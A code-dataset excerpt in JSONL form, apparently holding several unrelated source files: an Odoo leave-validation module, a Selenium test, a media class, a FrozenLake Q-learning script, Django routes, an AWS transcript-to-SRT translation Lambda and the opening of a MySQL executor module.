'date_to', 'holiday_status_id', 'employee_id')\n def onchange_date_to(self,date_from=False, date_to=False,half_day=False, holiday_status_id=False, employee_id=False):\n res = super(HrHolidays, self).onchange_date_to(date_from=date_from, date_to=date_to,half_day=half_day, holiday_status_id=holiday_status_id, employee_id=employee_id)\n if self.half_day:\n if res.get('value') and res.get('value').get('number_of_days_temp'):\n res['value']['number_of_days_temp'] = res.get('value').get('number_of_days_temp') - 0.50\n if (res.get('value').get('number_of_days_temp') - 0.50) > 0.5:\n self.am_or_pm = 'AM'\n return res\n\n @api.onchange('half_day', 'date_from', 'holiday_status_id','employee_id')\n def onchange_half_day(self):\n if self.half_day == True:\n if self.date_from != False:\n date_to_with_delta = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n self.date_to = str(date_to_with_delta)\n self.number_of_days_temp = 0.50\n else:\n self.date_to = self.date_from\n self.number_of_days_temp = 0.50\n else:\n result = self.onchange_date_to(date_from=self.date_from, date_to=self.date_to,half_day=False,holiday_status_id=self.holiday_status_id.id,employee_id=self.employee_id.id)\n if self.date_from:\n df = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta(hours=9)\n self.date_to = df\n self.number_of_days_temp = result['value']['number_of_days_temp']\n self.am_or_pm = False\n\n @api.onchange('am_or_pm')\n def onchange_am_or_pm(self):\n if self.half_day and self.date_from and self.date_to:\n if self.am_or_pm == 'AM':\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n if self.am_or_pm == 'PM':\n if self.number_of_days_temp > 0.5:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n self.am_or_pm = 'AM'\n else:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=6)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n\n @api.model\n def create(self, vals):\n res = super(HrHolidays, self).create(vals)\n\n if self._context.get('off_in_lieu', False):\n if res.employee_id.leave_manager:\n\n temp_id = self.env['ir.model.data'].get_object_reference('sg_leave_types', 'email_temp_leave_approval')[1]\n# ctx = self.env.context.copy() if self.env.context else {}\n# menu_id = self.env['ir.model.data'].get_object_reference('hr_holidays', 'menu_open_allocation_holidays')[1]\n# action_id = self.env['ir.model.data'].get_object_reference('sg_leave_types', 'open_allocation_holidays_extend')[1]\n# base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')\n# ctx['approval_link'] = base_url + \"/web?#id=\"+ str(res.id) +\"&view_type=form&model=hr.holidays&menu_id=\" + str(menu_id) + \"&action=\" + str(action_id)\n# ctx.pop('default_state')\n# self.sudo().with_context(ctx).send_email(res.id, temp_id, force_send=True)\n\n return res\n\n @api.multi\n def copy(self, default=None):\n# self.ensure_one()\n# \n# date_from = datetime.datetime.strptime(str(datetime.datetime.today().date()), '%Y-%m-%d')\n# date_to = datetime.datetime.strptime(str(datetime.datetime.today().date()), '%Y-%m-%d') + datetime.timedelta(hours=8)\n# \n# default.update({'date_from': str(date_from), 'date_to': str(date_to)})\n raise UserError(_('Sorry, you can not duplicate Leave...!'))\n\n return super(HrHolidays, self).copy(default)\n\n @api.constrains('holiday_status_id','employee_id')\n def _check_sg_maternity_leave_16_weeks(self):\n '''\n The method used to Validate for Maternity Leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name in ['ML16','ML15','ML8','ML4']:\n if rec.employee_id.gender == 'male':\n raise ValidationError(_('Employee should be Female! \\n This Leave is only applicable for Female !'))\n if rec.holiday_status_id.pre_approved == True:\n if rec.employee_id and rec.employee_id.id and rec.employee_id.join_date:\n if rec.employee_id.singaporean == True and rec.employee_id.depends_singaporean == True:\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n qualify_date = joining_date + relativedelta(months=3)\n if datetime.datetime.today().date() < qualify_date:\n raise ValidationError(_('Not Qualified in Joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n two_month_date = from_date - relativedelta(months=2)\n if two_month_date < datetime.datetime.today().date():\n raise ValidationError(_('Warning! \\n Maternity Leave request should be submitted 2 months prior to the requested date.!'))\n else:\n raise ValidationError(_('Warning! \\n Child is not Singapore citizen!'))\n else:\n raise ValidationError(_('You are not able to apply Request for this Maternity leave!'))\n\n\n @api.constrains('holiday_status_id','employee_id','date_from','date_to','child_birthdate')\n def _check_paternity_leave(self):\n '''\n The method used to Validate for Paternity Leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n today_date = datetime.datetime.today().date()\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'PL':\n if rec.holiday_status_id.pre_approved == True:\n date_from = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n date_to = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n if (date_to - date_from).days != 14:\n raise ValidationError(_('Warning! \\n Entitlement of 2 weeks in continuous block !'))\n if rec.employee_id.gender == 'female':\n raise ValidationError(_('Employee should be Male! \\n This Leave is only applicable for Male !'))\n if not rec.employee_id.dependent_ids:\n raise ValidationError(_('No Child Depends found! \\n Please Add Child Detail in Depend list for this employee Profile !'))\n depends_ids = self.env['dependents'].search([('employee_id','=',rec.employee_id.id),('birth_date','=',rec.child_birthdate),('relation_ship','in',['son','daughter'])])\n if len(depends_ids.ids) == 0:\n raise ValidationError(_('No Child found! \\n No Child found for the Birth date %s !'%(rec.child_birthdate)))\n if rec.employee_id and rec.employee_id.id and rec.employee_id.singaporean == True and rec.employee_id.depends_singaporean == True and rec.employee_id.join_date:\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n qualify_date = joining_date + relativedelta(months=3)\n if today_date >= qualify_date:\n child_birth_date = datetime.datetime.strptime(rec.child_birthdate, DEFAULT_SERVER_DATE_FORMAT).date()\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n qualify_date = child_birth_date + relativedelta(years=1)\n # child_bd_week = child_birth_date.isocalendar()\n sixteen_weeks_later = child_birth_date + relativedelta(weeks=16)\n before_qualify_date = from_date - relativedelta(weeks=2)\n# if to_date > qualify_date:\n# raise ValidationError(_('Not Qualified in Joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n if to_date > sixteen_weeks_later:\n raise ValidationError(_('Warning! \\n Paternity leave should be taken within 16 weeks of the child\\'s birth date!'))\n if before_qualify_date < today_date:\n raise ValidationError(_('Warning! \\n Paternity Leave request should be submitted 2 weeks prior to the requested date.!'))\n else:\n raise ValidationError(_('Not Qualified in Joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n else:\n raise ValidationError(_('Warning! \\n Child is not Singapore citizen!'))\n\n if rec.type == 'remove' and rec.holiday_status_id.name == 'SPL':\n if rec.holiday_status_id.pre_approved:\n if not rec.employee_id.dependent_ids:\n raise ValidationError(_('No Child Depends found! \\n Please Add Child Detail in Depend list for this employee Profile !'))\n depends_ids = self.env['dependents'].search([('employee_id', '=', rec.employee_id.id), ('relation_ship', 'in', ['son', 'daughter'])])\n if rec.employee_id.marital != 'married':\n raise ValidationError(_('Warning.! \\n Employee should be Married !'))\n\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n today_date = datetime.datetime.today().date()\n if (today_date - joining_date).days < 90:\n raise ValidationError(_('Employee %s should have 3+ months experiance in same company.' % (rec.employee_id.name)))\n\n if len(depends_ids.ids) == 0:\n raise ValidationError(_('No Child found! \\n No Child found for the Birth date %s !' % (rec.child_birthdate)))\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n date_to = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n if (date_to - from_date).days != 6:\n raise ValidationError(_('Warning! \\n Entitlement of 1 weeks in continuous block !'))\n\n if rec.employee_id and rec.employee_id.id and rec.employee_id.singaporean and rec.employee_id.join_date:\n flag = False\n for dependent in rec.employee_id.dependent_ids:\n if dependent.relation_ship in ['son', 'daughter']:\n birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n if (birth + relativedelta(years=1)) >= from_date and birth <= from_date:\n flag = True\n\n# to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n before_qualify_date = from_date - relativedelta(weeks=2)\n if not flag:\n raise ValidationError(_('Warning! \\n Shared Parental leave should be taken within 1 Year of the child\\'s birth date!'))\n if before_qualify_date < today_date:\n raise ValidationError(_('Warning! \\n Shared Parental Leave request should be submitted 2 weeks prior to the requested date.!'))\n else:\n raise ValidationError(_('Warning! \\n Child is not Singapore citizen!'))\n\n @api.constrains('holiday_status_id','date_from','date_to','employee_id')\n def _check_marriage_leave(self):\n '''\n The method used to Validate other compassionate leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name in ('MLC','ML'):\n if rec.employee_id.gender == 'female' and rec.employee_id.marital != 'married':\n raise ValidationError(_('Employee should be Married!'))\n\n if rec.holiday_status_id.pre_approved == True:\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n qualify_date = from_date - relativedelta(weeks=2)\n if qualify_date < datetime.datetime.today().date():\n raise ValidationError(_('Marriage Leave request should be submitted 2 weeks prior to the requested date.!'))\n\n @api.constrains('holiday_status_id','employee_id','date_from','date_to')\n def _check_sg_medical_opt_leave(self):\n '''\n The method used to Validate medical leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)\n date_today = datetime.datetime.today()\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'MOL':\n if rec.holiday_status_id.pre_approved == True:\n if rec.employee_id.join_date and rec.employee_id.join_date <= today:\n join_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT)\n one_year_day = join_date + relativedelta(months=12)\n three_months = join_date + relativedelta(months=3)\n if three_months < date_today and one_year_day > date_today:\n med_rmv = 0.0\n self._cr.execute(\"SELECT sum(number_of_days_temp) FROM hr_holidays where employee_id=%d and holiday_status_id = %d and type='remove'\" % (rec.employee_id.id, rec.holiday_status_id.id))\n all_datas = self._cr.fetchone()\n if all_datas and all_datas[0]:\n med_rmv += all_datas[0]\n res_date = relativedelta(date_today ,join_date)\n tot_month = res_date.months\n if tot_month == 3 and med_rmv > 5:\n raise ValidationError(_('You can not apply medical leave more than 5 days in 3 months!'))\n elif tot_month == 4 and med_rmv > 8:\n raise ValidationError(_('You can not apply medical leave more than 8 days in 4 months!'))\n elif tot_month == 5 and med_rmv > 11:\n raise ValidationError(_('You can not apply medical leave more than 11 days in 5 months!'))\n elif tot_month >= 6 and med_rmv > 14:\n raise ValidationError(_('You can not apply medical leave more than 14 days in one Year!'))\n if three_months > date_today:\n raise ValidationError(_('You are not able to apply Medical leave Request.!'))\n\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Medical Certificate only')\n }}\n\n @api.constrains('holiday_status_id','date_from','date_to')\n def _check_off_in_leave(self):\n '''\n The method used to Validate other compassionate leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n curr_month = datetime.datetime.today().month\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'OIL':\n if rec.holiday_status_id.pre_approved:\n if rec.is_urgent:\n raise ValidationError(_('You can not apply Urgent off in leave!'))\n# from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).month\n# to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).month\n# if int(from_date) != int(curr_month) or int(to_date) != int(curr_month):\n# raise ValidationError(_('You can apply off in leave Request for current month only!'))\n\n @api.onchange('holiday_status_id','employee_id')\n def on_change_leavetype(self):\n res = super(HrHolidays, self).on_change_leavetype()\n if self.employee_id:\n self.next_manager_id = self.employee_id.leave_manager.id\n if self.holiday_status_id and self.holiday_status_id.name == 'MOL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Medical Certificate only')\n }}\n if self.holiday_status_id and self.holiday_status_id.name == 'HOL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Hospitalization Certificate only')\n }}\n\n if self.holiday_status_id and self.holiday_status_id.name == 'OIL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Off In-Lieu cannot be used for overseas trip')\n }}\n\n if self._context.get('off_in_lieu', False):\n leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n if leave_status:\n return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n else:\n return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n return res\n\n# @api.onchange('employee_id')\n# def onchange_employee(self):\n# res = super(HrHolidays, self).onchange_employee()\n# for record in self:\n# record.next_manager_id = record.employee_id and record.employee_id.parent_id.id or False\n# record.holiday_status_id = record.holiday_status_id and record.holiday_status_id.id or False\n# \n# if self._context.get('off_in_lieu', False):\n# leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n# if leave_status:\n# return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n# else:\n# return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n# return res\n\n @api.onchange('employee_id')\n def onchange_employee(self):\n\n result = {}\n leave_type_ids = self.env['hr.holidays.status'].search([])\n self.leave_config_id = False\n self.holiday_status_id = False\n result.update({'domain':{'holiday_status_id':[('id','not in',leave_type_ids.ids)]}})\n if self.employee_id and self.employee_id.id:\n self.department_id = self.employee_id.department_id\n if self.employee_id.sudo().gender:\n self.gender = self.employee_id.sudo().gender\n if self.employee_id.leave_config_id and self.employee_id.leave_config_id.id:\n self.leave_config_id = self.employee_id.leave_config_id.id\n if self.employee_id.leave_config_id.holiday_group_config_line_ids and self.employee_id.leave_config_id.holiday_group_config_line_ids.ids:\n leave_type_list = []\n for leave_type in self.employee_id.leave_config_id.holiday_group_config_line_ids:\n leave_type_list.append(leave_type.leave_type_id.id)\n result['domain'] = {'holiday_status_id':[('id','in',leave_type_list)]}\n else:\n return {'warning': {'title': 'Leave Warning', 'message': 'No Leave Structure Found! \\n Please configure leave structure for current employee from employee\\'s profile!'},\n 'domain':result['domain']}\n\n for record in self:\n record.next_manager_id = record.employee_id and record.employee_id.parent_id.id or False\n record.holiday_status_id = record.holiday_status_id and record.holiday_status_id.id or False\n\n if self._context.get('off_in_lieu', False):\n leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n if leave_status:\n return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n else:\n return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n\n return result\n","sub_path":"beta-dev1/propell_modules/sg_leave_types/models/hr_holidays.py","file_name":"hr_holidays.py","file_ext":"py","file_size_in_byte":51718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"642162139","text":"'# -*- coding: utf-8 -*-'\nimport time\n\nfrom data.data_rare.mng_data import url\n\n\ndef test_open_morrocana(app):\n app.open(url)\n app.morrocana.check_Page()\ndef test_home_Treatment_Mask(app):\n features = app.driver.find_elements_by_css_selector('.feature-box.hidden-xs')\n for c in features:\n time.sleep(2)\n clp = c.find_element_by_css_selector('.box-content>span').text\n media = c.find_element_by_css_selector('.box-image>img').get_attribute('src')\n print(\"Feature :\"+clp, media)\n\n # panels = app.driver.find_elements_by_css_selector('.panel-block-row')\n # for p in panels:\n # app.scroll(p)\n\n # slider = app.driver.find_element_by_css_selector('.table-container')\n # app.scroll(slider)\n # clicker = slider.find_elements_by_css_selector('.tabs-container>label')\n #\n # for c in clicker:\n # app.scroll(c)\n # if c.get_attribute('class')==('active'):\n # title = slider.find_element_by_css_selector('.title')\n # print(title.text)\n # time.sleep(3)\n # elif c.get_attribute('class') != ('active'):\n # c.click()\n\n\n\n\n\n\n# https://github.com/pytest-dev/pytest-html","sub_path":"tests_RARE/tests_MNG/test_MNG_ui.py","file_name":"test_MNG_ui.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"346181661","text":"import re\n\n\nclass Media():\n \"\"\" This class describes a media object like a\n movie, tv show or videogame. \n \"\"\"\n \n tile_content = '''\n
        \n \n

        {movie_title}

        \n

        Released: {release_date}

        \n
        {body}
        \n
        \n '''\n\n def __init__(self, title, description, image, trailer_url, release_date):\n \"\"\" Constructor for Media object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n \"\"\"\n self.title = title\n self.description = description\n self.poster_image_url = image\n self.trailer_youtube_url = trailer_url\n self.release_date = release_date\n\n def getYouTubeId(self):\n \"\"\" returns the id for the media's youtube trailer\n \"\"\"\n youtube_id_match = re.search(\n r'(?<=v=)[^&#]+', self.trailer_youtube_url)\n youtube_id_match = youtube_id_match or re.search(\n r'(?<=be/)[^&#]+', self.trailer_youtube_url)\n return (youtube_id_match.group(0) if youtube_id_match else None)\n\n def getTileContent(self):\n \"\"\" uses the tile content template to create a html div for the media\n object\n \"\"\"\n trailer_youtube_id = self.getYouTubeId()\n description = self.getDescription()\n return Media.tile_content.format(\n movie_title=self.title,\n poster_image_url=self.poster_image_url,\n trailer_youtube_id=trailer_youtube_id,\n release_date=self.release_date,\n body=description)\n\n # get the description of the media object\n def getDescription(self):\n \"\"\" returns the description\n \"\"\"\n return self.description\n\n\nclass Movie(Media):\n \"\"\" This class describes a movie adding a director\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description, image,\n trailer_url, release_date, director):\n \"\"\" Constructor for Movie object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n director - (String) director of the movie\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.director = director\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Directed by'\n statement at the end of the description\n \"\"\"\n return self.description + \" Directed by \" + self.director + \".\"\n\n\nclass VideoGame(Media):\n \"\"\" This class describes a videogame adding a developer\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description, image,\n trailer_url, release_date, developer):\n \"\"\" Constructor for VideoGame object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n developer - (String) developer of the game\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.developer = developer\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Developed by'\n statement at the end of the description\n \"\"\"\n return self.description + \" Developed by \" + self.developer + \".\"\n\n\nclass TelevisionShow(Media):\n \"\"\" This class describes a television adding a network\n parameter to the Media object\n \"\"\"\n \n def __init__(self, title, description,\n image, trailer_url, release_date, network):\n \"\"\" Constructor for TelevisionShow object.\n title - (String) the media's title\n description - (String) a description\n image - (String) a link to an image for the media\n trailer_url - (String) a link to the youtube trailer\n release_date - (String) release date of the media\n network - (String) the network the show aired on\n \"\"\"\n Media.__init__(self, title, description,\n image, trailer_url, release_date)\n self.network = network\n\n def getDescription(self):\n \"\"\" returns the description adds a 'Aired on'\n statement at the end of the description\n \"\"\"\n return self.description + \" Aired on \" + self.network + \".\"\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193052040","text":"# Dummy Q-Table learning algorithm\nfrom __future__ import print_function\n\nimport gym\nfrom gym.envs.registration import register\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\n\nregister(\n id = 'FrozenLake-v3',\n entry_point = 'gym.envs.toy_text:FrozenLakeEnv',\n kwargs={\n 'map_name': '4x4',\n 'is_slippery': False\n }\n)\n\ndef rargmax(vector):\n # vector: [ 0. 1. 1. 0.]\n # Return the maximum number of an array element.\n m = np.amax(vector) # m = 1.\n # Return the list of indices of the elements that are non-zero and the given condition is True\n indices = np.nonzero(vector == m)[0] # indices = [1, 2]\n return random.choice(indices)\n\nenv = gym.make(\"FrozenLake-v3\")\nenv.render()\n\nprint(\"env.observation_space.n:\", env.observation_space.n)\nprint(\"env.action_space.n:\", env.action_space.n)\nQ = np.zeros([env.observation_space.n, env.action_space.n])\n\n#Discount Factor\ndiscount_factor = .99 # <-- Updated for ver.2\nmax_episodes = 2000\n\n# list to contain total rewards and steps per episode\nrList = []\n\nfor i in range(max_episodes):\n # Reset environment and get first new observation\n state = env.reset()\n rAll = 0\n done = False\n\n # The Q-Table learning algorithm\n while not done:\n #Decaying Random Noise <-- Updated for ver.2\n #e = 0.1 / (i + 1)\n e = 1. / ((i / 50) + 10)\n if np.random.rand(1) < e:\n action = env.action_space.sample()\n else:\n action = rargmax(Q[state, :])\n\n #Decaying Random Noise <-- Updated for ver.2\n #action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i+1))\n\n # Get new state and reward from environment\n new_state, reward, done, info = env.step(action)\n\n # Update Q-Table with new knowledge using learning rate\n Q[state, action] = reward + discount_factor * np.max(Q[new_state, :]) # <-- Updated for ver.2\n\n rAll += reward\n state = new_state\n\n rList.append(rAll)\n\nprint(\"Success rate: \" + str(sum(rList)/max_episodes))\nprint(\"Final Q-Table Values\")\nprint(\"LEFT DOWN RIGHT UP\")\nfor i in range(16):\n for j in range(4):\n print(\"%6.4f\" % Q[i][j], end=\", \")\n print()\nplt.plot(rList)\nplt.ylim(-0.5, 1.5)\nplt.show()","sub_path":"2.ReinforcementLearning/FrozenLake/FrozenLake-2.py","file_name":"FrozenLake-2.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162006413","text":"from django.urls import path\nfrom .views import (\n AdminHome,\n ArticleCreate,\n ArticleUpdate,\n ArticleDelete,\n Profile,\n UserPanel\n)\n\napp_name = \"account\"\nurlpatterns = [\n path('', AdminHome.as_view(), name='home'),\n path('article/create', ArticleCreate.as_view(), name='article-create'),\n path('article/update/', ArticleUpdate.as_view(), name='article-update'),\n path('article/delete/', ArticleDelete.as_view(), name='article-delete'),\n path('profile/', Profile.as_view(), name='profile'),\n path('user-panel/', UserPanel.as_view(), name='user-panel'),\n]","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308281324","text":"import boto3\nimport json\nimport os\nimport logging\nimport re\n\ndef main(event, context):\n translate = boto3.client('translate')\n s3 = boto3.resource('s3')\n dynamodb = boto3.resource(\"dynamodb\")\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.info(event)\n\n record = event['Records'][0]\n bucket = record['s3']['bucket']['name']\n key = record['s3']['object']['key']\n logger.info(key)\n content_object = s3.Object(bucket, key)\n logger.info(content_object)\n file_content = content_object.get()['Body'].read().decode('utf-8')\n logger.info(\"file_content: \" + file_content)\n json_content = json.loads(file_content)\n logger.info(json_content)\n lookup_uuid = key.split('.')[0]\n table_name = os.getenv(\"TABLE\")\n table = dynamodb.Table(table_name)\n table_record = table.get_item(\n Key={\n 'uuid': lookup_uuid,\n }\n )\n logger.info(table_record)\n SOURCE_LANGUAGE = table_record['Item']['input_language'].split('-')[0]\n TARGET_LANGUAGE = table_record['Item']['target_language'].split('-')[0]\n if TARGET_LANGUAGE == 'arb':\n TARGET_LANGUAGE = 'ar'\n elif TARGET_LANGUAGE == 'cmn':\n TARGET_LANGUAGE = 'zh'\n elif TARGET_LANGUAGE == 'nb':\n TARGET_LANGUAGE = 'no'\n \n textToSynthesize = json_content['results']['transcripts'][0]['transcript']\n lastPronunIdx = len(json_content['results']['items']) - 1\n # Get last pronunciation\n while json_content['results']['items'][lastPronunIdx]['type'] != \"pronunciation\":\n lastPronunIdx -= 1\n firstPronunIdx = 0\n # Get first pronunciation\n while json_content['results']['items'][firstPronunIdx]['type'] != \"pronunciation\":\n firstPronunIdx += 1\n job_name = json_content[\"jobName\"]\n output_bucket = os.getenv('OUTPUT_BUCKET')\n result = translate.translate_text(\n Text=textToSynthesize,\n SourceLanguageCode=SOURCE_LANGUAGE, \n TargetLanguageCode=TARGET_LANGUAGE,\n )\n\n start = float( json_content['results']['items'][firstPronunIdx][\"start_time\"])\n end = float(json_content['results']['items'][lastPronunIdx][\"end_time\"])\n\n textToGetPhrases = result[\"TranslatedText\"]\n\n phrases = getPhrasesFromTranslation(textToGetPhrases, start, end)\n logger.info(\"phrases: \" + str(phrases))\n srtContent = writeSRT( phrases )\n\n logger.info(srtContent)\n output_name = job_name + \".srt\"\n s3object = s3.Object(output_bucket, output_name)\n s3object.put(\n Body=(bytes(srtContent.encode('utf-8')))\n )\n\n# Create phrases from translation input from aws translate\ndef getPhrasesFromTranslation( translation, start, end ):\n\n words = translation.split()\n phrase = { 'start_time': '', 'end_time': '', 'words' : [] }\n phrases = []\n nPhrase = True\n x = 0\n c = 0\n\n for word in words:\n\n # If it is a new phrase, then get the start_time of the first item\n if nPhrase == True:\n nPhrase = False\n c += 1\n\n # Append the word to the phrase...\n phrase[\"words\"].append(word)\n x += 1\n\n # Add the phrase to the phrases, generate a new phrase, etc.\n if x == 10:\n phrases.append(phrase)\n phrase = { 'start_time': '', 'end_time': '', 'words' : [] }\n nPhrase = True\n x = 0\n\n if(len(phrase['words']) > 0):\n phrases.append(phrase)\n\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger.info(\"C: \" + str(c))\n logger.info(\"Generated Phrases\" + str(phrases))\n\n timeDelta = (end-start) / c\n time = start\n for phraseIdx in range(len(phrases)):\n phrases[phraseIdx]['start_time'] = getTimeCode(time + 0.01)\n time += timeDelta\n phrases[phraseIdx]['end_time'] = getTimeCode(time)\n\n return phrases\n\n\n# Create SRT file from phrases\ndef writeSRT( phrases ):\n\n output = \"\"\n x = 1\n \n for phrase in phrases:\n \n output += str(x) + \"\\n\" \n x += 1\n output += phrase[\"start_time\"] + \" --> \" + phrase[\"end_time\"] + \"\\n\" \n # Format words\n out = getPhraseText( phrase )\n output += out + \"\\n\\n\" \n\n return output\n\n\n# Format words to add proper spacing\ndef getPhraseText( phrase ):\n\n length = len(phrase[\"words\"])\n\n out = \"\"\n for i in range( 0, length ):\n if re.match('[a-zA-Z0-9]', phrase[\"words\"][i]):\n if i > 0:\n out += \" \" + phrase[\"words\"][i]\n else:\n out += phrase[\"words\"][i]\n else:\n out += phrase[\"words\"][i]\n \n return out\n\n# Turn seconds into formatted time code for SRT\ndef getTimeCode( seconds ):\n t_hund = int(seconds % 1 * 1000)\n t_seconds = int( seconds )\n t_secs = ((float( t_seconds) / 60) % 1) * 60\n t_mins = int( t_seconds / 60 )\n return str( \"%02d:%02d:%02d,%03d\" % (00, t_mins, int(t_secs), t_hund ))\n","sub_path":"cicero/lambda/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"435753342","text":"\"\"\"This 'testing' executor is built to be run in the vagrant VM.\n\nIt is basically the same as the normal Hyaline executor except that it doesn't rely on HDFS.\n\"\"\"\n\nimport os\nimport sys\nimport stat\nfrom hyaline.common.log import HyalineLogger\nlog = HyalineLogger()\nfrom hyaline.common.pkgutil import unpack_assets\nfrom hyaline.executor.mysql_task_control import MySQLTaskControlProvider\nfrom hyaline.executor.executor import HyalineExecutor\nfrom hyaline.executor.hyaline_task_runner import HyalineTaskRunnerProvider\nfrom hyaline.executor.binary_mysql_installer import BinaryMysqlInstallerProvider\nfrom hyaline.executor.sandbox import Sandbox\nfrom hyaline.executor.backup import 